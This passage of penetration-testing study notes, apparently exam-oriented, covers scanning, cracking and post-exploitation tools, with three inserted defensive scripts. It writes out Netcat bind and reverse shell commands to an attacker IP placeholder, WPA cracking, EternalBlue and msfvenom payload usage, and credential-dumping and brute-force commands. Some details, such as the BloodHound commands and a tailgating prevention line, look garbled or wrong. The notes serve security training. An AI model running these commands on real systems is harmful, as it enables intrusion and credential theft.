It collects information about Wi-Fi networks (SSIDs, BSSIDs, GPS coordinates, etc.) and allows users to search, map, and analyze this data.
WiGLE is popular among security researchers, penetration testers, and wireless network enthusiasts for discovering and mapping Wi-Fi networks.
Usage: Find and map Wi-Fi networks.
Example: Searching WiGLE.net for Wi-Fi networks in a specific area.
InSSIDer
Purpose: Wi-Fi network scanner.
Usage: Identify Wi-Fi networks and their configurations.
Example: Using InSSIDer to scan for nearby Wi-Fi networks.
OSINTframework.com
Purpose: Collection of OSINT tools and resources.
Usage: Reference for various OSINT tools.
Example: Visiting OSINTframework.com to find tools for a specific type of OSINT task.
Wireshark/tcpdump
Purpose: Network protocol analyzers.
Usage: Capture and analyze network traffic.
Example:
Wireshark: Using the graphical interface to capture packets.
tcpdump: tcpdump -i eth0 -w capture.pcap
Aircrack-ng
Purpose: Suite of tools for Wi-Fi network security assessment.
Usage: Capture and crack WEP/WPA-PSK keys.
Example:
Capturing packets: airodump-ng wlan0
Cracking a WPA handshake: aircrack-ng -w wordlist.txt -b target_bssid capture_file.cap
Chapter 3
Objective 3.1
Container Scans
Purpose: Assess security of containerized applications and environments.
Techniques:
Sidecar Scans: Utilize a sidecar container to monitor and analyze the security of a main container.
Example: A sidecar container running a security tool to check for vulnerabilities in a main application container.
Application Scans
Purpose: Identify vulnerabilities in applications at different stages of development and deployment.
Techniques:
Dynamic Application Security Testing (DAST): Test running applications for vulnerabilities by simulating attacks.
Example: Using tools like OWASP ZAP to perform DAST on a web application.
Interactive Application Security Testing (IAST): Combine elements of DAST and SAST by monitoring the application from within during runtime.
Example: Using tools like Contrast Security to identify vulnerabilities as the application runs.
Software Composition Analysis (SCA): Analyze third-party and open-source components for known vulnerabilities.
Example: Using tools like Snyk or Black Duck to scan dependencies for vulnerabilities.
Static Application Security Testing (SAST): Analyze source code for vulnerabilities without executing the code.
Example: Using tools like SonarQube or Checkmarx for static code analysis.
Subtypes:
Infrastructure as Code (IaC): Analyze infrastructure configuration files (e.g., Terraform, CloudFormation) for security issues.
Source Code Analysis: Directly examine the application’s source code to find vulnerabilities.
Mobile Scan: Assess mobile applications for security vulnerabilities.
Example: Using tools like MobSF to scan Android or iOS applications.
Network Scans
Purpose: Identify vulnerabilities in network devices, services, and configurations.
Techniques:
TCP/UDP Scan: Scan for open TCP and UDP ports to identify services running on the network.
Example: Using Nmap to perform TCP/UDP scans on a target network.
Command: nmap -sS -sU target_ip
Stealth Scans: Use techniques to avoid detection by network security systems while scanning.
Example: Using Nmap's SYN scan (also known as half-open scan) to perform stealth scans.
Command: nmap -sS target_ip
Host-Based Scans
Purpose: Identify vulnerabilities on individual hosts (e.g., servers, workstations).
Techniques:
Agent-based: Install an agent on the host to gather detailed information.
Example: Using Nessus agents to perform deep scans on hosts.
Agentless: Use network protocols (e.g., SMB, SSH) to gather information without installing software.
Example: Using OpenVAS to perform remote scans on hosts.
Authenticated vs. Unauthenticated Scans
Authenticated Scans:
Purpose: Perform scans with credentials to get deeper insights into vulnerabilities.
Benefits: Access to detailed information such as configuration files, installed software, and patches.
Example: Running a credentialed Nessus scan to check for missing patches.
Unauthenticated Scans:
Purpose: Perform scans without credentials, simulating an external attacker.
Benefits: Identify vulnerabilities exposed to unauthenticated users.
Example: Using Nmap for a network scan without credentials.
Secrets Scanning
Purpose: Identify sensitive information such as API keys, passwords, and tokens in source code and configuration files.
Techniques:
Automated Tools: Use tools specifically designed to find secrets.
Example: Using GitGuardian to scan repositories for exposed secrets.
Wireless Scans
Purpose: Assess security of wireless networks.
Techniques:
SSID Scanning: Identify and list the SSIDs of nearby wireless networks.
Example: Using tools like Kismet to scan for SSIDs.
Channel Scanning: Identify which channels wireless networks are operating on.
Example: Using tools like WiFi Analyzer to scan channels.
Signal Strength Scanning: Measure the signal strength of wireless networks to determine proximity and potential interference.
Example: Using tools like NetSpot to map signal strength.
Industrial Control Systems (ICS) Vulnerability Assessment
Purpose: Identify vulnerabilities in ICS environments, which are critical for industrial operations.
Techniques:
Manual Assessment: Perform a hands-on review of ICS components and configurations.
Example: Conducting a physical and logical assessment of PLCs, SCADA systems, and network configurations.
Port Mirroring: Use port mirroring on network switches to capture and analyze ICS traffic without interrupting operations.
Example: Setting up port mirroring on a switch to capture ICS traffic for analysis using Wireshark.
Tools
Nikto
Purpose: Web server scanner.
Nikto is an open-source web server scanner that performs comprehensive tests against web servers for multiple items, including over 6,700 potentially dangerous files or programs, checks for outdated versions of over 1,250 servers, and version-specific problems on over 270 servers.
Nikto is widely used by penetration testers, security researchers, and IT professionals to identify vulnerabilities and misconfigurations in web servers.
Usage: Identify potential issues in web servers, such as outdated software, misconfigurations, and vulnerabilities.
Example: Scanning a web server for common vulnerabilities.
Command: nikto -h http://targetwebsite.com
Greenbone/OpenVAS
Purpose: Vulnerability scanning and management.
Greenbone Vulnerability Manager (GVM), often referred to as OpenVAS (Open Vulnerability Assessment System), is an open-source framework for vulnerability scanning and management.
OpenVAS is part of the GVM suite and provides comprehensive vulnerability scanning capabilities.
It helps organizations identify security issues, misconfigurations, and vulnerabilities in their networks and systems.
Usage: Perform comprehensive vulnerability assessments across networks and systems.
Example: Using OpenVAS to scan a network for vulnerabilities.
Command: openvas-start to start the service, then configure and run scans through the web interface.
TruffleHog
Purpose: Secrets detection tool.
Usage: Scan repositories for high-entropy strings and secrets such as API keys and passwords.
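Worked example (added here; this is not TruffleHog's or GitGuardian's code and not from the original notes): a minimal secrets detector of the kind the Secrets Enumeration and Secrets Scanning sections describe. It combines a fixed pattern for AWS access key IDs with a Shannon-entropy check on values assigned to secret-looking variable names, and runs over constructed sample lines. The access key ID is Amazon's documented example value; the variable-name list and the 3.5 bits-per-character threshold are assumptions chosen for illustration.

```python
import math
import re
from typing import List, Tuple

# Constructed sample lines (not from a real repository). The access key ID is
# Amazon's documented example value, not a live credential.
SAMPLE_LINES = [
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "log_level = debug",
    "placeholder_token = 'aaaaaaaaaaaaaaaaaaaaaaaa'",
]

# AWS access key IDs have a fixed prefix and length, so a pattern is enough.
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

# Secret-looking variable name followed by a value of 20+ token characters.
# The name list is an assumption; real scanners carry hundreds of patterns.
SECRET_ASSIGNMENT = re.compile(
    r"(?i)\w*(?:secret|password|passwd|token|api[_-]?key)\w*"
    r"\s*[:=]\s*['\"]?([A-Za-z0-9/+_\-=]{20,})"
)

ENTROPY_THRESHOLD = 3.5  # bits per character; assumed cut-off for "random-looking"


def shannon_entropy(value: str) -> float:
    """Shannon entropy in bits per character of the given string."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, finding type, matched value) for each suspected secret."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for match in AWS_KEY_ID.finditer(line):
            findings.append((lineno, "aws-access-key-id", match.group(0)))
        match = SECRET_ASSIGNMENT.search(line)
        if match:
            value = match.group(1)
            # A 24-character placeholder like 'aaaa...' has zero entropy and is
            # skipped; a real key or random token scores well above the threshold.
            if shannon_entropy(value) >= ENTROPY_THRESHOLD:
                findings.append((lineno, "high-entropy-secret", value))
    return findings


if __name__ == "__main__":
    for lineno, kind, value in scan_lines(SAMPLE_LINES):
        # Mask the value so the report itself does not leak the secret.
        print(f"line {lineno}: {kind}: {value[:4]}...{value[-4:]}")
```

The entropy check is what lets the detector ignore obvious placeholders while still catching random-looking values that no fixed pattern would match; short human-chosen passwords (under 20 characters) slip through this heuristic, which is why real scanners pair it with large pattern libraries.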
BloodHound
Purpose: Active Directory (AD) mapping and exploitation tool.
Usage: Identify and analyze AD relationships and permissions that could be exploited.
Example: Using BloodHound to map AD relationships and identify attack paths.
Command: Invoke-BloodHound -CollectionMethod All in PowerShell to collect data, then analyze with the BloodHound interface.
Tenable Nessus
Purpose: Comprehensive vulnerability scanner.
Tenable Nessus is a widely-used commercial vulnerability scanner designed to assess networks, systems, and applications for security vulnerabilities.
Developed by Tenable, Nessus offers robust scanning capabilities, ease of use, and comprehensive reporting.
It's popular among security professionals for identifying, prioritizing, and remediating vulnerabilities in IT environments.
Usage: Identify vulnerabilities, misconfigurations, and compliance issues across various systems.
Example: Running a vulnerability scan on a network.
Command: Configure and start scans through the Nessus web interface.
PowerSploit
Purpose: Post-exploitation framework for PowerShell.
PowerSploit is a collection of PowerShell scripts designed for offensive security and post-exploitation purposes.
It is widely used by penetration testers and red teamers to perform various tasks such as reconnaissance, exploitation, persistence, and data exfiltration.
PowerSploit leverages the capabilities of PowerShell to interact with the Windows operating system and perform complex tasks.
Usage: Perform various post-exploitation tasks such as privilege escalation, credential dumping, and persistence.
Example: Using PowerSploit to execute a PowerShell script for dumping credentials.
Grype
Purpose: Vulnerability scanner for container images and filesystems.
Grype is an open-source vulnerability scanner for container images and filesystems.
Developed by Anchore, it is designed to identify vulnerabilities in container images, making it an essential tool for DevOps and security teams to ensure the security of their containerized applications.
Usage: Identify known vulnerabilities in container images.
Example: Scanning a Docker image for vulnerabilities.
Command: grype docker:targetimage
Trivy
Purpose: Vulnerability scanner for containers, Kubernetes, and other artifacts.
Trivy is a comprehensive and easy-to-use open-source vulnerability scanner for container images, filesystems, and repositories.
Developed by Aqua Security, Trivy is known for its speed, accuracy, and simplicity.
It supports scanning for OS packages and application dependencies, making it a versatile tool for DevSecOps workflows.
Usage: Detect vulnerabilities, misconfigurations, and secrets.
Example: Scanning a container image for vulnerabilities.
Command: trivy image targetimage
Kube-hunter
Purpose: Kubernetes security tool.
Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters.
Developed by Aqua Security, it is used to identify security vulnerabilities and misconfigurations in Kubernetes environments.
Kube-hunter is particularly useful for penetration testers, security professionals, and Kubernetes administrators looking to enhance the security of their clusters.
Usage: Identify and exploit vulnerabilities in Kubernetes clusters.
Example: Running a scan to find vulnerabilities in a Kubernetes cluster.
Command: kube-hunter --remote targetclusterip
Objective 3.2
Validating Scan, Reconnaissance, and Enumeration Results
False Positives
Definition: Incorrectly identifying a non-vulnerability as a vulnerability.
Example: A scanner flags an outdated software version, but it's actually patched and secure.
Validation: Manually verify the flagged issue to confirm if it's a real vulnerability.
False Negatives
Definition: Failing to identify an actual vulnerability.
Example: A scanner misses a known SQL injection vulnerability due to misconfiguration.
Validation: Cross-check results with other tools or manual testing to ensure comprehensive coverage.
True Positives
Definition: Correctly identifying a real vulnerability.
Example: A scanner detects an open port that is genuinely exposed and vulnerable.
Validation: Verify the vulnerability through manual testing or exploitation.
Scan Completeness
Definition: Ensuring the scan has covered all intended targets and aspects.
Example: Verifying all network segments, hosts, and services were scanned.
Validation: Review scan logs and reports to ensure no areas were missed.
Troubleshooting Scan Configurations
Definition: Adjusting scan settings to ensure accurate and complete results.
Example: Modifying timeout settings or authentication credentials to ensure thorough scanning.
Validation: Perform test scans after configuration changes to verify improved accuracy and completeness.
Public Exploit Selection
Purpose: Choosing appropriate publicly available exploits to validate vulnerabilities.
Sources: Exploit databases such as Exploit-DB, Metasploit, and GitHub repositories.
Example: Selecting a Metasploit module to exploit a detected vulnerability.
Command: msfconsole, then search and use the relevant module, e.g., use exploit/windows/smb/ms17_010_eternalblue
Using Scripting to Validate Results
Purpose: Automating the validation of scan, reconnaissance, and enumeration results.
Scripting Languages: Python, Bash, PowerShell.
Examples:
Scripts for cross-checking open ports, vulnerable software versions, and open SMB shares.
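Worked example (added; not part of the original notes and not Nmap's own code): a Python script that parses Nmap's XML output (-oX) and cross-checks the open ports against an expected-service baseline. It reports unexpected open ports (candidate true positives), expected ports that did not show up (a possible false negative or an incomplete scan), and services whose version came from a banner, which must be confirmed against the real patch level before being reported, the classic false positive. The XML and the baseline are constructed samples.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Set, Tuple

# Constructed Nmap XML (-oX) output for two hosts; not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Expected open TCP ports per host, e.g. from the asset inventory (constructed).
BASELINE: Dict[str, Set[int]] = {
    "10.0.0.5": {22, 80},
    "10.0.0.6": {22, 443},
}

Finding = Tuple[str, str, Optional[int]]  # (finding type, host, port)


def parse_open_ports(xml_text: str) -> Dict[str, Dict[int, str]]:
    """Map each IPv4 host to {open port: 'service product version'}."""
    root = ET.fromstring(xml_text)
    hosts: Dict[str, Dict[int, str]] = {}
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ports: Dict[int, str] = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            parts = [] if svc is None else [
                svc.get("name", ""), svc.get("product", ""), svc.get("version", "")
            ]
            ports[int(port.get("portid"))] = " ".join(p for p in parts if p) or "unknown"
        hosts[addr_el.get("addr")] = ports
    return hosts


def validate(scan: Dict[str, Dict[int, str]],
             baseline: Dict[str, Set[int]]) -> List[Finding]:
    """Cross-check scan results against the baseline and list what needs attention."""
    findings: List[Finding] = []
    for host, expected in baseline.items():
        observed = scan.get(host, {})
        for port in sorted(set(observed) - expected):
            findings.append(("unexpected-open", host, port))     # candidate true positive
        for port in sorted(expected - set(observed)):
            findings.append(("expected-missing", host, port))    # false negative or incomplete scan
        for port, desc in sorted(observed.items()):
            if any(ch.isdigit() for ch in desc):
                findings.append(("verify-version", host, port))  # banner version: confirm patch level by hand
    for host in sorted(set(scan) - set(baseline)):
        findings.append(("host-not-in-baseline", host, None))     # scope / completeness check
    return findings


if __name__ == "__main__":
    for finding in validate(parse_open_ports(SAMPLE_NMAP_XML), BASELINE):
        print(finding)
```

Against a real scan, replace SAMPLE_NMAP_XML with the contents of the -oX file; the "verify-version" entries are the ones to check manually, because distributions backport fixes without changing the banner version.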
Objective 3.3
Tailgating
Definition: Unauthorized entry by following an authorized person.
Prevention: Limit shared resources, use proper access controls and permissions.
Packet Crafting
Definition: Creating custom network packets to test, exploit, or disrupt systems.
Example: Sending malformed packets to crash a system or bypass security controls.
Purpose: Identify vulnerabilities, perform DoS attacks, or evade detection.
Prevention: Use robust intrusion detection/prevention systems, validate input data rigorously.
Tools
Metasploit
Definition: An open-source penetration testing framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Features:
Exploit Modules: Contains numerous exploit modules for a variety of vulnerabilities.
Payloads: Offers various payloads, such as Meterpreter, to interact with the exploited system.
Auxiliary Modules: Includes tools for scanning, fuzzing, and more.
Example: Using Metasploit to exploit a known vulnerability in an outdated web application and gain shell access.
Usage:
msfconsole → Launches the Metasploit console, which is the primary interface for interacting with the Metasploit Framework.
search [keyword] → Searches the Metasploit database for exploits, payloads, and auxiliary modules matching the keyword.
use [exploit_path] → Selects the exploit module to use. Example: use exploit/windows/smb/ms17_010_eternalblue.
Netcat
Definition: A versatile networking utility that reads and writes data across network connections using the TCP/IP protocol.
Features:
Port Scanning: Basic functionality for port scanning.
Data Transfer: Can be used for transferring files.
Reverse Shells: Can set up reverse or bind shells for remote access.
Example: Using Netcat to set up a reverse shell to a compromised system.
Usage:
Port scanning
Banner grabbing
File transfer
Creating reverse and bind shells
Debugging and network diagnostics
Flags:
-l: Listen mode, for inbound connects
-p: Local port number
-e: Program to execute after connection occurs
-n: Numeric-only IP addresses, no DNS
-v: Verbose mode
-u: UDP mode
-z: Zero-I/O mode (used for scanning)
Shells:
Bind Shells:
A bind shell sets up a listener on the victim machine and waits for an incoming connection. Once a connection is established, the attacker can execute commands on the victim machine.
Victim → nc -l -p [port] -e /bin/bash → Setting up a listener
Attacker → nc [victim_IP] [port] → Connecting to the listener
Reverse Shell:
A reverse shell, instead of listening for a connection, initiates a connection back to the attacker's machine. This is useful when the victim machine is behind a firewall or NAT.
Attacker → nc -l -p [port] → setting up a listener
Victim → nc [attacker_IP] [port] -e /bin/bash → connecting back to the attacker's machine
Nmap
Definition: A network scanning tool used for discovering hosts and services on a computer network.
Features:
Port Scanning: Identifies open ports on target systems.
Service Detection: Determines what services are running on open ports.
Operating System Detection: Identifies the OS of target systems.
Nmap Scripting Engine (NSE): Extends Nmap’s capabilities by using scripts.
Example: Scanning a network to identify open ports and running services with Nmap.
Usage:
-sP (or -sn): Ping Scan - Discover live hosts without performing a port scan.
-p: Specify Port(s) - Scan specific ports.
-p-: Scan all 65535 ports.
-sT: TCP Connect Scan - Uses the operating system's network services to establish a connection with the target ports.
-sS: TCP SYN Scan (Default and most popular) - Half-open scan, doesn't complete the TCP handshake.
-sU: UDP Scan - Scans for open UDP ports.
-sV: Version Detection - Detects service versions running on open ports.
-sX: The XMAS scan is named because all the flags (FIN, PSH, and URG) in the TCP header are set, making it look like a lit-up Christmas tree. It is used to identify listening ports on the target system.
-sF: FIN Scan - Sends TCP packets with the FIN flag set to check if ports are closed or open.
-sN: NULL Scan - Sends TCP packets with no flags set to identify open or closed ports.
-sA: ACK Scan - Sends TCP packets with only the ACK flag set; used to map firewall rules (filtered vs. unfiltered ports) rather than to find open ports.
-O: OS Detection - Identifies the operating system of the target host.
-A: Aggressive Scan - Enables OS detection, version detection, script scanning, and traceroute.
-sC: Default Script Scan - Runs a set of default Nmap Scripting Engine (NSE) scripts.
--script: Run specific NSE scripts.
-oN: Normal output.
-oX: XML output.
-oG: Grepable output.
-oA: Output in all formats (normal, XML, and grepable).
Timing & Performance:
-T0: Paranoid (very slow, good for evading detection).
-T1: Sneaky (slow, good for evading detection).
-T2: Polite (slows down to use less bandwidth and target resources).
-T3: Normal (default).
-T4: Aggressive (faster, uses more bandwidth and resources).
-T5: Insane (very fast, uses maximum bandwidth and resources).
Impacket
Definition: A collection of Python classes for working with network protocols.
It allows developers to create and manipulate network packets at a low level, making it an essential tool for network administrators, penetration testers, and cybersecurity researchers.
Impacket focuses on providing low-level programmatic access to various protocols such as SMB, MSRPC, and LDAP.
Features:
SMB and MSRPC Protocols: Useful for creating custom network tools and performing various tasks in penetration tests.
Scripts: Includes scripts for executing commands on remote systems, dumping secrets, and more.
Example: Using Impacket's smbexec.py to execute commands on a remote Windows system.
Usage:
wmiexec.py → Executes commands on remote systems via WMI.
smbexec.py → Executes commands on remote systems via SMB.
psexec.py → Executes commands on remote systems via SMB, using the Windows service control manager.
mimikatz.py → Executes the Mimikatz tool on remote systems to extract credentials.
getTGT.py → Requests a TGT (Ticket Granting Ticket) from a Kerberos Key Distribution Center (KDC).
secretsdump.py → Dumps secrets from a remote machine without executing any agent.
CrackMapExec (CME)
Definition: A post-exploitation tool that helps automate the assessment of large Active Directory networks.
CrackMapExec (CME) is a versatile post-exploitation tool used for assessing the security of large Active Directory networks.
It simplifies the process of evaluating the security posture of networks by providing an easy-to-use interface for a variety of tasks, including credential validation, remote command execution, and more.
Features:
Credential Validation: Validates credentials across a network.
Command Execution: Executes commands on multiple systems.
Password Spraying: Automates the password spraying attack.
Example: Using CME to validate credentials and execute commands across an Active Directory environment.
Usage:
cme [protocol] [target] [options]
Protocols:
smb: SMB protocol (Windows file sharing)
ldap: LDAP protocol (Directory services)
winrm: Windows Remote Management
mssql: Microsoft SQL Server
Wireshark/tcpdump
Definition: Network protocol analyzers used to capture and analyze network traffic.
Features:
Packet Capture: Captures live network traffic for analysis.
Filters: Applies filters to focus on specific types of traffic.
Example: Using Wireshark to capture and analyze HTTP traffic to identify sensitive information being transmitted in plaintext.
Usage:
tcpdump -i eth0 -w capture.pcap
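Worked example (added; not from the original notes and not Wireshark's or tcpdump's code): a self-contained pcap reader that performs the check in the Wireshark example above, finding credentials sent in the clear. It builds a small capture in memory (constructed Ethernet/IPv4/TCP frames carrying an HTTP Basic-auth request, an FTP PASS command, a benign GET and an HTTP login form; hosts, users and passwords are made up) and parses it with only the standard library. The report carries the user name but never the password, so it can be pasted into a ticket.

```python
import base64
import re
import struct
from typing import Iterator, List, Tuple


def _ip(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def build_frame(payload: bytes, src: str, dst: str, sport: int, dport: int) -> bytes:
    """Ethernet/IPv4/TCP frame around a payload (checksums left zero; the reader ignores them)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, _ip(src), _ip(dst))
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    """Classic pcap container (magic 0xa1b2c3d4, link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


# Constructed traffic: hosts, users and passwords are made up.
SAMPLE_PCAP = build_pcap([
    build_frame(b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
                b"Authorization: Basic " + base64.b64encode(b"alice:Winter2024!") + b"\r\n\r\n",
                "10.0.0.10", "10.0.0.80", 51000, 80),
    build_frame(b"PASS s3cret\r\n", "10.0.0.11", "10.0.0.21", 51001, 21),
    build_frame(b"GET /index.html HTTP/1.1\r\nHost: intranet.example\r\n\r\n",
                "10.0.0.12", "10.0.0.80", 51002, 80),
    build_frame(b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
                b"username=bob&password=hunter2",
                "10.0.0.13", "10.0.0.80", 51003, 80),
])


def iter_tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Yield (src, sport, dst, dport, payload) for every IPv4/TCP frame in the capture."""
    offset = 24  # skip the pcap global header
    while offset + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap, offset)
        offset += 16
        frame = pcap[offset:offset + incl_len]
        offset += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
            continue  # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[14 + 9] != 6:
            continue  # not TCP
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = 14 + ihl
        sport, dport = struct.unpack_from("!HH", frame, tcp)
        data_offset = (frame[tcp + 12] >> 4) * 4
        yield src, sport, dst, dport, frame[tcp + data_offset:]


BASIC_AUTH = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FORM_PASSWORD = re.compile(rb"(?<![A-Za-z0-9_])(?:password|passwd|pwd)=([^&\r\n]+)", re.IGNORECASE)
FTP_PASS = re.compile(rb"^PASS\s+\S+", re.MULTILINE)


def find_plaintext_credentials(pcap: bytes) -> List[dict]:
    """Report where credentials crossed the wire unencrypted; passwords are not included."""
    findings = []
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        where = {"src": src, "dst": dst, "dport": dport}
        m = BASIC_AUTH.search(payload)
        if m:
            try:
                user = base64.b64decode(m.group(1)).split(b":", 1)[0].decode("ascii", "replace")
            except ValueError:
                user = "<undecodable>"
            findings.append({**where, "kind": "http-basic-auth", "user": user})
        if dport == 21 and FTP_PASS.search(payload):
            findings.append({**where, "kind": "ftp-plaintext-password"})
        if FORM_PASSWORD.search(payload):
            findings.append({**where, "kind": "http-form-password"})
    return findings


if __name__ == "__main__":
    for finding in find_plaintext_credentials(SAMPLE_PCAP):
        print(finding)
```

To run it on a capture taken with the tcpdump command above, read capture.pcap as bytes and pass it to find_plaintext_credentials in place of SAMPLE_PCAP; the reader handles classic pcap files only, not pcapng, and looks at single frames rather than reassembled streams.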
msfvenom
Definition: A tool within the Metasploit framework used to generate payloads.
msfvenom is a command-line utility that is part of the Metasploit Framework. It is used to generate payloads, encode shellcode, and create executable files that can be used in penetration testing and security assessments.
Features:
Payload Generation: Creates various types of payloads for different platforms.
Encoding: Encodes payloads to evade antivirus detection.
Formats: Generates payloads in various formats, such as executables, scripts, and more.
Example: Using msfvenom to generate a malicious executable payload that opens a reverse shell.
Usage:
msfvenom -p [payload] [options]
Payloads:
Windows Meterpreter Reverse TCP: windows/meterpreter/reverse_tcp
Linux Meterpreter Reverse TCP: linux/x86/meterpreter/reverse_tcp
Responder
Definition: A tool used for network poisoning attacks.
It works by poisoning name resolution requests and responding with fake answers, tricking clients into sending their authentication data to the attacker.
Features:
LLMNR, NBT-NS, and MDNS Poisoning: Intercepts and responds to broadcast name-resolution requests to capture credentials.
Hash Capture: Captures hashed credentials (e.g., NTLMv2) for offline cracking with a separate tool such as hashcat or John the Ripper.
Example: Using Responder to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic on a Windows network.
Usage:
sudo python3 Responder.py -I [interface]
Hydra
Definition: Hydra is a fast and flexible password-cracking tool used for brute force attacks against a variety of network services.
Features:
Brute Force Attacks: Supports numerous protocols (SSH, FTP, HTTP, HTTPS, SMB, and many others) for brute force attacks on login services.
Parallel Connections: Allows multiple parallel connections for faster cracking.
Custom Wordlists: Supports custom wordlists for username and password combinations.
Example: Using Hydra to brute force SSH login credentials on a remote server.
Usage:
hydra [options] [target] [module]
Flags:
-l [username]: Specifies a single username.
-L [username file]: Specifies a file with a list of usernames.
-p [password]: Specifies a single password.
-P [password file]: Specifies a file with a list of passwords.
-s [port]: Specifies the port to connect to.
-t [tasks]: Specifies the number of parallel connections.
-f: Stops after the first valid login is found.
-v: Enables verbose mode.
-V: Shows the login and password for each attempt.
-o [output file]: Specifies the file to write found logins and passwords.
hashcat
Definition: A high-performance password cracking tool.
It is used to crack hashed passwords by utilizing various attack modes and optimizations.
Features:
Multi-Platform Support: Runs on various operating systems including Windows, Linux, and macOS.
Various Attack Modes: Supports dictionary attacks, brute-force attacks, mask attacks, and hybrid attacks.
GPU Acceleration: Utilizes GPU to speed up the cracking process.
Example: Using hashcat to perform a dictionary attack on a set of hashed passwords to recover plaintext passwords.
Usage → hashcat [options] [hashfile] [wordlist]
Flags:
-m [hash type]: Specifies the hash type (e.g., MD5, SHA1).
MD5: -m 0
SHA1: -m 100
SHA256: -m 1400
SHA512: -m 1700
NTLM: -m 1000
bcrypt: -m 3200
-a [attack mode]: Specifies the attack mode (e.g., dictionary, brute-force).
Straight: -a 0 (Dictionary attack)
Combination: -a 1 (Combines words from two dictionaries)
Brute-Force: -a 3 (Exhaustive search of all possible combinations)
Hybrid Wordlist + Mask: -a 6 (Applies masks to a wordlist)
Hybrid Mask + Wordlist: -a 7 (Applies wordlists to masks)
-o [output file]: Specifies the file to write cracked passwords.
--potfile-path [file]: Specifies the path to the potfile for saving cracked hashes.
-r [rule file]: Applies rules to modify or generate passwords.
-t [threshold]: Markov threshold (--markov-threshold) for mask attacks; this is not a thread count (hashcat's workload is tuned with -w, the workload profile).
--status: Displays the current status of the cracking process.
John the Ripper
Definition: A fast password cracker available for many operating systems.
Features:
Multi-Platform Support: Runs on various operating systems including Unix, Windows, and MacOS.
Cracking Modes: Supports dictionary attacks, brute-force attacks, and rule-based attacks.
Customization: Allows custom rules to refine attack strategies.
Example: Using John the Ripper to crack Unix password hashes extracted from a compromised system.
Usage → john [options] [password file]
Flags:
--format=[format]: Specifies the hash format (e.g., raw-md5, sha256).
MD5: raw-md5
SHA1: raw-sha1
SHA256: raw-sha256
SHA512: raw-sha512
NTLM: nt
bcrypt: bcrypt
DES: des
--wordlist=[file]: Specifies the path to a wordlist file (dictionary attack).
--rules: Applies rules to the wordlist to generate additional passwords.
--incremental: Enables an incremental brute-force attack.
--status: Displays the current status of the cracking process.
--show: Displays the cracked passwords.
Crack MD5 hashes using a wordlist → john --format=raw-md5 --wordlist=/path/to/wordlist.txt hashfile.txt
Show cracked passwords → john --show hashfile.txt
BloodHound
Definition: A tool for analyzing and attacking Active Directory relationships and permissions.
It maps out and visualizes complex AD environments, identifying potential attack paths that could be exploited to gain unauthorized access or escalate privileges.
BloodHound is particularly useful for penetration testers and security professionals to perform AD enumeration and identify security weaknesses in Windows networks.
Features:
Graph Database: Uses graph theory to find hidden relationships in Active Directory environments.
Visual Representation: Provides a graphical interface to visualize attack paths.
Query Capability: Allows complex queries to identify potential attack vectors.
Example: Using BloodHound to map out and analyze privilege escalation paths in an Active Directory domain.
Collection flags:
-c All: Collects all data categories (users, groups, trusts, etc.).
-d [domain]: Specifies the target domain.
-dc [domain controller]: Specifies the domain controller to query.
-u [username]: Specifies the username to use.
-p [password]: Specifies the password for the username.
-o [output directory]: Specifies the directory to save collected data.
Collect all data → bloodhound -d [domain] -u [username] -p [password] -c all
BloodHound analyzes and visualizes the data collected by SharpHound.
Analyze data with BloodHound → bloodhound -i /path/to/output -o /path/to/analysis
Medusa
